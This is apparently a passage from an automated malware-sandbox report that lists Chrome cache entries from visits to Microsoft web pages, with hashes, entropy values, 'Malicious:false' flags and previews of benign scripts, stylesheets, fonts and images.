                                                                                                                      Preview:'use strict';var UHFButton=$("header #c-uhf-nav-cta \x3e a");0<$("meta[name\x3d'blue-cta']").length&&UHFButton.addClass("blue-cta");UHFButton.css("visibility","visible");var mainLandmark=$("main"),rootNode=$(".root");0< !mainLandmark.length&&0<rootNode.length&&rootNode.attr("role","main");.function changeSupToAnchor(){try{var a="",b="",c=[];$("sup:not(.no-link)").each(function(){a=$(this).text();a=a.replace("*(","");a=a.replace(")","");c=a.split(", ");for(var e=0;e<c.length;e++)b+="\x3ca aria-label\x3d'Footnote "+c[e]+"' href\x3d'javascript:void(0);' class\x3d'c-hyperlink supBLink'\x3e\x3cspan class\x3d'supText'\x3e"+c[e]+"\x3c/span\x3e\x3c/a\x3e\x3cspan\x3e, \x3c/span\x3e";$(this).html(b);b=""});$("sup").find("span:last").remove();var d=$(".list-unstyled li a.superscript");d.attr("href",."javascript:void(0);");d.addClass("supLink");d.each(function(){0==$(this).find(".supFn").length&&$(this).wrapInner("\x3cspan class\x3d'supFn'\x3e\x3c/span\x3e")})}catch(e){console.log(e)}}.function n

                                                                                                                      Chrome Cache Entry: 394

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 29888, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):29888
                                                                                                                      Entropy (8bit):7.993034480673089
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:768:b2epE/P8HSbsbNl+GfEMuHyS4aAyoVfszfHS1W:6eSkgsbGGanzAjIyg
                                                                                                                      MD5:E465F101F881B07CCFBB55D51D18135F
                                                                                                                      SHA1:0D76B152EA1AE4AA68DB36DCC7BD204ACDC571D3
                                                                                                                      SHA-256:6F5EBFD0FC9A520ADCA234FDD34B4DFBEB106942A6F44E65FC1AC54F7D2D6498
                                                                                                                      SHA-512:2C1F730DB5108DDE4731F22838AD7EEF4D6698ED5EA0C0951B81B21722DF8051623923672C46F9397F81E74741CDEC794F03AAC37E532D1223A1A1CE448C73AA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/support-icons/mdl2/latest_v4_70.woff2
                                                                                                                      Preview:wOF2......t........X..tb.........................`..`..6.*..Y..... ....6.$..,.. .. ..s. ..S."..`...@.."..........!!.T5..?.........#t..7. .. ~"?A..A...4./..}.'.D.8.E......C......T..o.......l.UJ*..SB...U.D6..W..uV.j,...+.>"N...}.&E..P~....z..w...Z".k...S:..t.7.fA.ic;%HZi...W.....w...I.p..........=>....) X ....@B......R ..P..$H.....h.{,..X..l. ..uY.w.Kc..+........r.H....... .....!....7$.b......@(Mp..,."z..(......V....y.E..w\...n./...&...+...R.......\~d,.....S..r%.s.s.......h...:.@.!h..(.< .@..0.P2H*..!..r.6..V.r.:..)T.9T..n......;....+a...).L+....eX....|.x...$]hS....+e+ HK.H'Q..RJ..X...}.....l....=S.G.e.{..I%9.1.O~k....@.$.{.M*^.......~z...2...r.]b..[......(.H... ...z.)...&....9..$.Q1F...1......7C..UJ...T..F....Z..K.......F..&L0c...p..N8..g...W\...q........Oz..O./......#..... ..L0B.A(..#..#..D..(..M4b.A,..`A.q.'..$ .D$..d..B.RIE.iH'..d .L.....M6r.A..3......PH!.(B1.(......2.S..*PI%..B5......:.S....H#.hB3.h......6...:.I'..B7.......>...+V.0.A.1...

                                                                                                                      Chrome Cache Entry: 395

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (503)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):558
                                                                                                                      Entropy (8bit):4.98634955391743
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:c83DOkFYerjD6tD7fgu1M+WqQRxsZAsDFYAWCyQPO:cmZr6t/zpeT/oWCyaO
                                                                                                                      MD5:A3BC5418F2834309CE2918B15F3B8EEA
                                                                                                                      SHA1:62BA2712C6D4960F1057E103F6E1F3C95F2C701B
                                                                                                                      SHA-256:B2B62643A7C4FE4A4E12934AD819F0293CC00181B78D8091AFFFF3617CEB96B1
                                                                                                                      SHA-512:460E22E36E93BEC194D00D47754108539D2E54FF59D4293EEC25463BC3D642879C10D9BBFD881BBE5EC244819F325C422B6D7A7504000BBCE432E4D2A08FB58B
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";function e(e){return document.querySelectorAll(e)}function t(e,t){e.remove(),t.style.removeProperty("display")}window.addEventListener("load",(function(){var o,r=e(".ocpSectionLayout .ocpSection"),n=e(".ocpSectionLayout .shimmer-effect");if(r.length===n.length)for(var i=0;i<n.length;i++){var c=(o=n[i],Number(o.getAttribute("shimmer-delay")));setTimeout(t,c,n[i],r[i])}else n.forEach((function(e){e.remove()})),r.forEach((function(e){e.style.removeProperty("display")}))}))}();.//# sourceMappingURL=shimmerExperiment.Main.min.js.map

                                                                                                                      Chrome Cache Entry: 396

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3618
                                                                                                                      Entropy (8bit):7.927185096934077
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:7MX/zsJdnoyrScwrFhEmNg0UuMQcYQXiWIwheMs+:7+AJdnnrQ00UsOE+
                                                                                                                      MD5:4E5B2AAAB56D5439F181579EAE911ADC
                                                                                                                      SHA1:CE1F66351F1EDD03EADB8104F8009DE0E1C8BF4B
                                                                                                                      SHA-256:3B17ACCA4955E114A23D24244AA773A464D8599497365FFB8D97D5CCC791BD7A
                                                                                                                      SHA-512:338D1A49549A82886718182F909A7A28E4DA6555BF6F23611F404C111201F9D14BFE62C59B68ABD4271A9A7ADF3F80128E65ED60C05370A80EF2090F0A8925F8
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF....WEBPVP8X...........-..ALPHq.......m.........9..a62. !.2.2?..mm..j..i....m+..g..m.m.I.6Im.n.$.'\.}?wG.....O.o.E.,.".?.g]..6..]./R.y.....smb....6l....R.6l.asw...!j._.o!.i6..mDJ_6.]#"...B.o..smb.....y>..t.Q...Dy6q."...6....c.....5L..........T..O..<.L./..mo(.bQ=...*v. S.0%........J/..{9.1..H4...t..+..... ...._..&....i&].j.j...8]...!..X.t...U..R,...B.kU+.d*m......l.t.....\...E%D\.dw.$.\....C..w...-t..Z..............#.RO.....LJ....w667.q..O@.......\........??..}.............%..../R..z.Llk.7....d\...%.x...9..5.H....'..+w..2...q..+"..*V'..i..t6..?.z.r...h..c..G<G....o.I.{..XH)....RJ.I.(#i....%..... pR.Z.........~.J.....g...q...;v ......a..?..0.s.2.. ...\..../......>......:.0.u_...9[]P.)R.#...O....VFD.....3 G.0..R.z....j..@t...Kr.d.6..4.....d|.\.-.4-R.M..IQ.T..N(..K-.s..O-..r4....)o..H...h..?JK27...<.H.W.\......bVw.. ...tR8....N.....|...l....`...s..YED.-.....%2.Hh)"....W...D.S.+...QR....:FK.%b.\YjkE.MNIq.8!..]...[.TPw.H.cb..VR.Q.=......D

                                                                                                                      Chrome Cache Entry: 397

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (605)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):179808
                                                                                                                      Entropy (8bit):5.556656445593751
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                      MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                      SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                      SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                      SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/custom-oneds.min.ACSHASHc3aec3d03bc5447975e3ee25b53f6c32.js
                                                                                                                      Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var

                                                                                                                      Chrome Cache Entry: 398

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26288
                                                                                                                      Entropy (8bit):7.984195877171481
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                                      MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                      SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                      SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                      SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                      Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U

                                                                                                                      Chrome Cache Entry: 399

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (534)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):19236
                                                                                                                      Entropy (8bit):4.957542756789534
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:9zzYyDqAWpM8go1q7q9Qfg7c7obVebVYbVlbVg7Lq/qVqJqZ9jk/kVkaBVKBVWH5:9zzYyDqAWpM8go1q7q9Qfg7c7oReRYRS
                                                                                                                      MD5:AC48C90DAF8C653B94A6858350DE0C59
                                                                                                                      SHA1:164611585875F2F3FF1D2384D307A79C328856E9
                                                                                                                      SHA-256:772D95D573FB7E287D7C9CA726D997F57457D464274647A2EF6FE9ACE7FA048C
                                                                                                                      SHA-512:16427EC4CC9E0959A393DC55139717EF5A5E0D5542084588FA888763641A0DBED4A64EC43C2E3DC0DFFFDD2AB47C3F304024EE5A4DFA98DA60C0C0067AA58843
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/Inpagenavigation/v1/Inpagenavigation/clientlibs/sites.min.ACSHASHac48c90daf8c653b94a6858350de0c59.css
                                                                                                                      Preview:.custom-sticky-nav .hidden-visibility{visibility:hidden}..custom-sticky-nav.stuck .hidden-visibility{visibility:visible}..custom-sticky-nav.stick{position:fixed;top:0;left:0;right:0;width:100%;z-index:1020;transition:position .3s ease-in-out}..Inpagenavigation .hide-on-load .fixed-sticky,.Inpagenavigation .hide-on-load .sticky,.custom-sticky-nav .nav-item.active::before{display:none}.@media only screen and (min-width:620px) and (max-width:642px){.custom-sticky-nav:not(.stuck) .windows-mobile li .dropdown .dropdown-menu.menu-height{height:100px;overflow-y:scroll}..Inpagenavigation .custom-sticky-nav.stuck .windows-inpage-nav ul.nav-links-mobile-fall li.active ul.dropdown-menu{height:100px;overflow-y:scroll}.}.@media only screen and (max-width:320px){.custom-sticky-nav.stuck .windows-inpage-nav .windows-mobile .dropdown .dropdown-menu,.custom-sticky-nav.stuck ul.nav-links-mobile-fall .dropdown .dropdown-menu{height:70px !important;overflow-y:scroll !important}.}..Inpagenavigation .hide-o

                                                                                                                      Chrome Cache Entry: 400

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32761)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):207132
                                                                                                                      Entropy (8bit):5.120233025860125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:KWHSGu7HDm48tljfy6l6Fr1RPG4xy8Swqp:KgWDm48tljfy6l6Fr1RPG4xy8Swqp
                                                                                                                      MD5:BE9ECFC70EAE42CCAC8A69FE1E11332F
                                                                                                                      SHA1:B8ED04004EF83444576DC39A0289652825092742
                                                                                                                      SHA-256:F590C43ACB8FE26F9D019BEAB2C935655E04A78C1E7CF637B68746A3490610D4
                                                                                                                      SHA-512:21BE3071A5A480B4E957409B125D0454845C3DC7D13C85466E73FBC2D09621EC3C7A7F5A754D21BB5BBB6BA9B30B4D054AD2176595BD607D7498BB4552450DE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-27T06:55:08Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENbb9d0de7cc374dc99259df2c4b823cef",stage:"production"},dataElements:{"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0}}},MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!(void 0!==window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},CMS:{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0?"RedT":"string"==typeof window.mldcc?"Azure":document.querySelector&&document.querySele

                                                                                                                      Chrome Cache Entry: 401

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):15286
                                                                                                                      Entropy (8bit):7.920093772155082
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PBOSXIcsH16kp+153RInfDCuhcuCMmr+sAY:ADcsUs+7SfDJhcuCM0zAY
                                                                                                                      MD5:B1266F754B66F7B007B60511E2A2C4A0
                                                                                                                      SHA1:2A7A404B98732BDEB9CD63C7A672AC0011788AEB
                                                                                                                      SHA-256:B0A544B82B7B83A42F0AEC9C46909290726F4F57BF437264FBE0CB17C2827B7B
                                                                                                                      SHA-512:676C337E3B4A1C22D52C5000ED8ABF0E233C558C7B46A690CEC8ED26C76D2C6DAF265EBCBC51FB9B863A8D4E381ADA5859D4EEEC4DF30150C7FBA3B5F5DF8DC0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/ccb7c2a6-17dd-4cc3-88b7-8da966e59f59.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...;KIDATx..{.-WU..-m).V.....b....&Fm.Fm...!Z..l)R.T!.a.(.QQ...U.gI..H.B...hy..-.O./.....:.....={....|..s..={....=k......~(...."..8..=e..4...>....m...i..t...}..-M.kd.c\b[...G.p...P..:&.@qbBS..!L..`>.RP=K...&...slX.S..t_)..L.....z.....u.[?.|.c..p>....r.UH-.9.,.>.cl.\t1...$..TWy..8......@!.b..:m...`Y,..06C.M...[.j....@?.H..Xn.F.4U.R-S5........l.\.....r.e.j...:..P'.)..%.Tn...g....N......M0.L.&R.H....L.....J.Oj.S.....0?.-RK....hs.g......X]..uS,R.c.C.[/..m....U..\C..y......E.B.H.G...[.......TE..BD...TM..)......MQK.R.gb.S.....@HU.....b...<...#.....K.?"..`..)..c..6.Q.r.T....`<.R3.%j..Ig`.....\..e..`Z.R.=.Sp.........Bj.....2..C....n.?.....(IQ!...L..T+..R.Z...#..vmn...).8.}7....@e..@G4....B..........AHA..]...,.V).!..L.B*..'..RI7..`<.R.3QB.......(.B.`a.o....P...;......1..`..\.s.....)uKmk.KX3.m....f...0.....d.l..@...I.....:......7$.E...m.....P....B.;.....P....B@.....B..2..S....

                                                                                                                      Chrome Cache Entry: 402

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):557
                                                                                                                      Entropy (8bit):5.017920631493034
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DEARGUGLqcidEEblemSFxEARuWGBUGLqcSWGBdEEbleeESFZ:D1Jcsl21uWHcSWilv
                                                                                                                      MD5:A722775809D2312F435036DEF15BCD62
                                                                                                                      SHA1:2C6CF2D7ED0D1810B6C96269A4509071575E5771
                                                                                                                      SHA-256:4DF68C42ED06B94BC6C7655FFA3F84487DCF88F2452B8BF43C217427E36E31A2
                                                                                                                      SHA-512:3A4325C787C32BB7373B73CF419E94200167AA7CF2E689E4E1F8D46C8D9DE7607A4EAA3A346F25C3711723A30C678DE61F8813EBF81EEB66EA536968825F6B43
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/back-to-top-button/v1/back-to-top-button/clientlibs/sites.min.ACSHASHa722775809d2312f435036def15bcd62.css
                                                                                                                      Preview:@media screen and (max-width:540px){.sticky.back-to-top.stuck{position:static}.}.@media screen and (min-width:540px){.sticky.back-to-top.pageHasChatContainer{bottom:32px !important;left:12px}.}.div.backToTopEditView[data-mount='back-to-top']{opacity:1 !important}.@media screen and (max-width:540px){.fixed-sticky.fixed-back-to-top.stuck{position:static}.}.@media screen and (min-width:540px){.fixed-sticky.fixed-back-to-top.pageHasChatContainer{bottom:32px !important;left:12px}.}.div.backToTopEditView[data-mount='fixed-back-to-top']{opacity:1 !important}

                                                                                                                      Chrome Cache Entry: 403

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30237)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):30289
                                                                                                                      Entropy (8bit):5.260974426031687
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:u2E2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:u1M0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:F04D3E51969894BD486CD9A9A1549EA6
                                                                                                                      SHA1:6DB7ED2E034FE99F5013144CA91DD21408F7AC36
                                                                                                                      SHA-256:33A747222E8AE5381AEB53C9671BB3EB309B7226587674CD6D901F99645A852B
                                                                                                                      SHA-512:C7BE3DAB8EF8DBCB3A0AA6022F8191F155358E4E974F0E42F9CD88C372EE77EB4513A6CC54E373CFE90232D67C6B02406B4D281D8158C24B51C8AA433452911C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/meversion?partner=SMCConvergence&market=en-us&uhf=1
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"smcconvergence","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authA

                                                                                                                      Chrome Cache Entry: 404

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32761)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):207132
                                                                                                                      Entropy (8bit):5.120233025860125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:KWHSGu7HDm48tljfy6l6Fr1RPG4xy8Swqp:KgWDm48tljfy6l6Fr1RPG4xy8Swqp
                                                                                                                      MD5:BE9ECFC70EAE42CCAC8A69FE1E11332F
                                                                                                                      SHA1:B8ED04004EF83444576DC39A0289652825092742
                                                                                                                      SHA-256:F590C43ACB8FE26F9D019BEAB2C935655E04A78C1E7CF637B68746A3490610D4
                                                                                                                      SHA-512:21BE3071A5A480B4E957409B125D0454845C3DC7D13C85466E73FBC2D09621EC3C7A7F5A754D21BB5BBB6BA9B30B4D054AD2176595BD607D7498BB4552450DE7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/launch-ENbb9d0de7cc374dc99259df2c4b823cef.min.js
                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-27T06:55:08Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENbb9d0de7cc374dc99259df2c4b823cef",stage:"production"},dataElements:{"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0}}},MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!(void 0!==window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},CMS:{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0?"RedT":"string"==typeof window.mldcc?"Azure":document.querySelector&&document.querySele

                                                                                                                      Chrome Cache Entry: 405

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1998)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):530473
                                                                                                                      Entropy (8bit):5.1558754449004525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:cJpYYYb5T2ZggigVl1e/zXJ5lbgutNPzedZTyatWYLe8dZshIw:cJpYb5T2Zggigv1e/zXJLbgunzedZTyT
                                                                                                                      MD5:13ABF4CF4F8384D04A599349524DBBAD
                                                                                                                      SHA1:BD1EE95DB4A6E7A1EE1937F47AD7C5B6D7633465
                                                                                                                      SHA-256:3E7CE05C8874B9F3628300101F40878DF98F23A09CD4ECC9C9E5CC8067D9068A
                                                                                                                      SHA-512:4FCA93D865844FFF1A452B343F75ED786111F1E508505DD841F954159A42E5B9CB587FDC8ADEEA431A14CD042FC4CF16305416CE4CA0C1E9D5E66803C2BD03A7
                                                                                                                      Malicious:false
                                                                                                                      Preview:./*!. * MWF (Moray) Extensions v2.15.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {..typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :..typeof define === 'function' && define.amd ? define(['exports'], factory) :..(global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';...var commonjsGlobal = typeof globalThis !== 'undefined' ? globalThis : typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : typeof self !== 'undefined' ? self : {};...var check = function (it) {.. return it && it.Math == Math && it;..};...// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028..var global$a =.. // eslint-disable-next-line es/no-global-this -- safe.. check(typeof globalTh

                                                                                                                      Chrome Cache Entry: 406

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (889)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):92962
                                                                                                                      Entropy (8bit):5.482012211093105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                      MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                      SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                      SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                      SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                                                                      Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]

                                                                                                                      Chrome Cache Entry: 407

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):309
                                                                                                                      Entropy (8bit):4.971196656935236
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                      MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                      SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                      SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                      SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                      Malicious:false
